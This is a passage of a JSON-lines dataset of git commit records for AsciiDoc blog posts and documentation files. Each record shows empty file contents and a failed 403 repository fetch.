2015-08-13-Cursos-de-Hubpress-Profesional.adoc","repos":"AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io","old_file":"_posts\/2015-08-13-Cursos-de-Hubpress-Profesional.adoc","new_file":"_posts\/2015-08-13-Cursos-de-Hubpress-Profesional.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"427de53a5079588f8316a2805bef58d7e971a82d","subject":"y2b create post They Tried To Shrink An iPhone...","message":"y2b create post They Tried To Shrink An iPhone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-11-They-Tried-To-Shrink-An-iPhone.adoc","new_file":"_posts\/2016-09-11-They-Tried-To-Shrink-An-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fafa3937b201b203f3b62388367053774811111","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11a4b86d384e88f2fc1f1d517d4c9aebb6578900","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fc9e036b2d23386a885488f9227eb2cbbc16be8","subject":"Update 2017-01-01-Lets-learn-Haskell-with-Physics.adoc","message":"Update 2017-01-01-Lets-learn-Haskell-with-Physics.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-01-Lets-learn-Haskell-with-Physics.adoc","new_file":"_posts\/2017-01-01-Lets-learn-Haskell-with-Physics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"0be4a224bad2490f1f383cdf54d6bc4759554560","subject":"Update 2018-02-26-How-to-undoing-changes-with-Git.adoc","message":"Update 2018-02-26-How-to-undoing-changes-with-Git.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2018-02-26-How-to-undoing-changes-with-Git.adoc","new_file":"_posts\/2018-02-26-How-to-undoing-changes-with-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7de2f27831fa5fbc43fcee0e037edb7facd7df83","subject":"Update 2015-10-14-Hello-World.adoc","message":"Update 2015-10-14-Hello-World.adoc","repos":"codelab-lbernard\/blog,codelab-lbernard\/blog,codelab-lbernard\/blog","old_file":"_posts\/2015-10-14-Hello-World.adoc","new_file":"_posts\/2015-10-14-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codelab-lbernard\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68f4623b81f35f4143c92196cf5c643dd4039cd2","subject":"Update 2016-05-10-Asciidoctor.adoc","message":"Update 2016-05-10-Asciidoctor.adoc","repos":"benignbala\/benignbala.hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/hubpress.io,benignbala\/hubpress.io,benignbala\/benignbala.hubpress.io","old_file":"_posts\/2016-05-10-Asciidoctor.adoc","new_file":"_posts\/2016-05-10-Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/benignbala\/benignbala.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f401dc6f6a1b3324c56a75168696c4386e8dd12","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9df758f6e43a2556a84e351ebd5aac72e5c10233","subject":"Update 2017-04-05-FPM-chat-log.adoc","message":"Update 2017-04-05-FPM-chat-log.adoc","repos":"gogonkt\/makenothing,gogonkt\/makenothing,gogonkt\/makenothing,gogonkt\/makenothing","old_file":"_posts\/2017-04-05-FPM-chat-log.adoc","new_file":"_posts\/2017-04-05-FPM-chat-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gogonkt\/makenothing.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e28c16230deb336d6f1e4d356cd123c6a9125485","subject":"Update 2017-05-31-Java-Classes.adoc","message":"Update 2017-05-31-Java-Classes.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Java-Classes.adoc","new_file":"_posts\/2017-05-31-Java-Classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable 
to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2ee19af0623f88ba46005a38f498f8443c580b1","subject":"Update 2016-01-12-UISearchBar-Customization-and-UISearchController-Replacement.adoc","message":"Update 2016-01-12-UISearchBar-Customization-and-UISearchController-Replacement.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-01-12-UISearchBar-Customization-and-UISearchController-Replacement.adoc","new_file":"_posts\/2016-01-12-UISearchBar-Customization-and-UISearchController-Replacement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0eafc420b9cb8d1fd92ddb0bf5f8ba0c54c3de0c","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c24c78e1c5a9979a3917390c169091741ed8c09a","subject":"fix typo in word environment","message":"fix typo in word environment","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db7493c3374f13229d84a51e0dd711d9ab8059e7","subject":"removed point about cerr and unitbuf","message":"removed point about cerr and unitbuf\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"adc62ccadfc526bb426a23ee99bf39a932c455a3","subject":"1.4 release blog","message":"1.4 release blog\n","repos":"apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2018-06-22-release-1.4.adoc","new_file":"_blog-src\/_posts\/2018-06-22-release-1.4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad927834a914cd03f781b68e7da046b1f2bcb7cd","subject":"y2b create post GIVEAWAY ANNOUNCEMENT","message":"y2b create post GIVEAWAY 
ANNOUNCEMENT","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-23-GIVEAWAY-ANNOUNCEMENT.adoc","new_file":"_posts\/2012-01-23-GIVEAWAY-ANNOUNCEMENT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a869f1967c7baa62431269d61835ba55fbb94164","subject":"Update 2016-04-12-Reflections-on-Ethics.adoc","message":"Update 2016-04-12-Reflections-on-Ethics.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-Reflections-on-Ethics.adoc","new_file":"_posts\/2016-04-12-Reflections-on-Ethics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88eabc248497220bb207baf1db955e0ed07131d5","subject":"Update 2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","message":"Update 2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","new_file":"_posts\/2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"229f471e9cfde67aec819b36f5fbe0690e4b2357","subject":"Changes to time zone keys documentation","message":"Changes to time zone keys documentation\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Time zone keys.asciidoc","new_file":"documentation\/Time zone keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5aa71cdbd28eaef27d406cc42a53fad8d638640b","subject":"recreate article","message":"recreate article\n","repos":"rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org","old_file":"news\/2015-10-26-WildFly902-Released.adoc","new_file":"news\/2015-10-26-WildFly902-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stuartwdouglas\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"69508bcb86287898d9e60319ba3d43bcff19139c","subject":"Update 2016-02-15-.adoc","message":"Update 2016-02-15-.adoc","repos":"hang-h\/hubpress.io,hang-h\/hubpress.io,hang-h\/hubpress.io,hang-h\/hubpress.io","old_file":"_posts\/2016-02-15-.adoc","new_file":"_posts\/2016-02-15-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hang-h\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"9b53b0f8e0803b6076212d0e47372814034aab44","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8903879a579299fae3b426bb367f529ee56cca18","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"374279a1ceb29ea9b403157b34ca020b3075f420","subject":"Create Reference.adoc","message":"Create Reference.adoc","repos":"igagis\/prorab,igagis\/prorab","old_file":"wiki\/Reference.adoc","new_file":"wiki\/Reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/prorab.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71d8ebe609def23c52bd0e7a83902cd052d66a7c","subject":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","message":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e23b98b2d28505ad3abe0606176c986070e31b4","subject":"add lab05","message":"add lab05\n","repos":"slbedu\/javase8-2016","old_file":"lab05\/README.adoc","new_file":"lab05\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slbedu\/javase8-2016.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9697774cc268bb5275c0e4573624f4f98bc6168","subject":"hawkular java agent blog (#290)","message":"hawkular java agent blog 
(#290)\n\n","repos":"objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/03\/24\/hawkular-java-agent.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/03\/24\/hawkular-java-agent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75dfcb3fdd503b15f10876816db5042d3c0f15c5","subject":"Draft Servlet perf blog","message":"Draft Servlet perf blog\n","repos":"apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2017-05-15-tuning-servlet-gateway.adoc","new_file":"_blog-src\/_posts\/2017-05-15-tuning-servlet-gateway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ecc6bd59be1cb59bc37728c080059ab31997b56b","subject":"Publish 2016-6-26-first-title.adoc","message":"Publish 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-first-title.adoc","new_file":"2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04de1fb36e933c7c9e4723db42ff65f249b3d19b","subject":"Draft document describing the overall goals and constraints for the Bazaar Scheduling scheme","message":"Draft document describing the overall goals and constraints for the Bazaar Scheduling scheme\n","repos":"valpo-sats\/scheduling-bazaar,valpo-sats\/scheduling-bazaar","old_file":"notes\/scheduling-bazaar.adoc","new_file":"notes\/scheduling-bazaar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/valpo-sats\/scheduling-bazaar.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b3e59ef60cc593245acf0b7e621cf44fe610a86e","subject":"Update 2015-04-29-Test.adoc","message":"Update 2015-04-29-Test.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-04-29-Test.adoc","new_file":"_posts\/2015-04-29-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"6012778981281078e2e9eb078c0ea718fc6882ec","subject":"Update 2017-08-10-FWFW.adoc","message":"Update 2017-08-10-FWFW.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-08-10-FWFW.adoc","new_file":"_posts\/2017-08-10-FWFW.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f1cc1297e632ac825bdb8829136f355b7249651","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3796a8878ae1b242b331288a44ab76a4e1fbe85a","subject":"Add contribution guide","message":"Add contribution guide\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/contribution-guide.asciidoc","new_file":"doc\/src\/main\/docs\/contribution-guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bded43636d048b9e657f75c364c17c38a5fc95cc","subject":"Add contributing guide for docs","message":"Add contributing guide for docs\n","repos":"linlynn\/spring-cloud-build,linlynn\/spring-cloud-build,royclarkson\/spring-cloud-build,spring-cloud\/spring-cloud-build,royclarkson\/spring-cloud-build,spring-cloud\/spring-cloud-build","old_file":"docs\/src\/main\/asciidoc\/contributing-docs.adoc","new_file":"docs\/src\/main\/asciidoc\/contributing-docs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/linlynn\/spring-cloud-build.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"43e4fb2dea18275da0ac31c86ff5002c94d10f98","subject":"CL lib note: trivial-dump-core","message":"CL lib note: trivial-dump-core\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5cb0dca4606fe136420ce0a3a0a789f77acca55f","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e3e95ecbb091b63abd9b87770cba78d21c53ab9","subject":"Create README.adoc","message":"Create README.adoc","repos":"rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python","old_file":"fade\/fade\/static\/README.adoc","new_file":"fade\/fade\/static\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rockwolf\/python.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"636426421959f03e897af2c572d533f942b1dad8","subject":"Update 2016-05-27-Coding-has-begun.adoc","message":"Update 2016-05-27-Coding-has-begun.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-05-27-Coding-has-begun.adoc","new_file":"_posts\/2016-05-27-Coding-has-begun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"117b67b89716de4ce224c3d0fe9be9ecd8988385","subject":"Update 2017-06-20-Watermelon-Shark.adoc","message":"Update 2017-06-20-Watermelon-Shark.adoc","repos":"polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io","old_file":"_posts\/2017-06-20-Watermelon-Shark.adoc","new_file":"_posts\/2017-06-20-Watermelon-Shark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/polarbill\/polarbill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"836ea0b275d4bd4cd1a451769bc8ecab82aeddae","subject":"Update 2017-07-20-Alphaskades-Blog.adoc","message":"Update 2017-07-20-Alphaskades-Blog.adoc","repos":"alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io","old_file":"_posts\/2017-07-20-Alphaskades-Blog.adoc","new_file":"_posts\/2017-07-20-Alphaskades-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alphaskade\/alphaskade.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f02dea96d6b845a4238b5326044f2ae1f10c5271","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca817e93f81dad40785a4cf4c0fdd067237d4ca2","subject":"BXMSDOC-51: Including Decision Server xPaaS Documentation.","message":"BXMSDOC-51: Including Decision Server xPaaS Documentation.\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_images\/xpaas_images\/decision_server.adoc","new_file":"using_images\/xpaas_images\/decision_server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The 
requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6083ba600b46ccb5851a48aa5fd586fd20d4b660","subject":"Update 2019-03-10-And-thats-an-Email.adoc","message":"Update 2019-03-10-And-thats-an-Email.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d25e44aa649998c62b2558d3f2d02588d720c3f3","subject":"Minor doc format fix.","message":"Minor doc format fix.\n","repos":"tcsavage\/cats,funcool\/cats","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcsavage\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"15dc812a6e8cd27aa0b986e10483293aae7cd56f","subject":"Added Camel 2.19.5 release notes to docs","message":"Added Camel 2.19.5 release notes to 